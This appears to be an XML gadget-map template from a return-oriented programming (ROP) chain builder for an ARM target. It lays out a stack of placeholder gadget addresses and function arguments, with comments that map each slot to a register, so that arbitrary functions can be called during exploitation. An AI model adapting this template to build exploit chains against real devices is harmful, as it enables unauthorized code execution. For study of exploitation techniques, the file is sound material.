<?xml version="1.0"?>

<gadgetmap>
	<!-- Match any amount of arguements that are values -->
	<regex>.*(\(vvrv{0,8}\))</regex>
	<stack>
	<data>GADGET_ADDRESS(pop_r5-r10)</data>
    <data>ARG2</data> 		    																	<!-- R5 NOT USED R2 gets set from RET R0 -->
    <data>FUNC_ADDRESS</data> 		    													<!-- R6 -->
    <data>0</data> 		    																		<!-- R7 -->
    <data>GADGET_ADDRESS(pop_r3)</data> 		    								<!-- R8 -->
    <data>ARG0</data> 		    																	<!-- R9 -->
    <data>ARG1</data> 		    																	<!-- R10 -->
    <data>GADGET_ADDRESS(jump_r8_set_arg_r0-r1_ret_r2)</data>  <!-- PC R2 automatically set to RET R0 here -->
		<data>ARG3</data>			    														<!-- R3 -->
		<data>GADGET_ADDRESS(pop_pc_nop)</data>			    			<!-- PC Added to try to align 0x10 everything -->
		<data>GADGET_ADDRESS(jump_r6_pop)</data>			    			<!-- PC -->
		<data>ARG4</data>												<!-- R4 -->
		<data>ARG5</data>												<!-- R5 -->
		<data>ARG6</data>												<!-- R6 -->
		<data>ARG7</data>												<!-- R7 -->
		<data>ARG8</data>												<!-- R8 -->
		<data>RETURN_ADDRESS</data>							<!-- PC return -->
	</stack>
</gadgetmap>
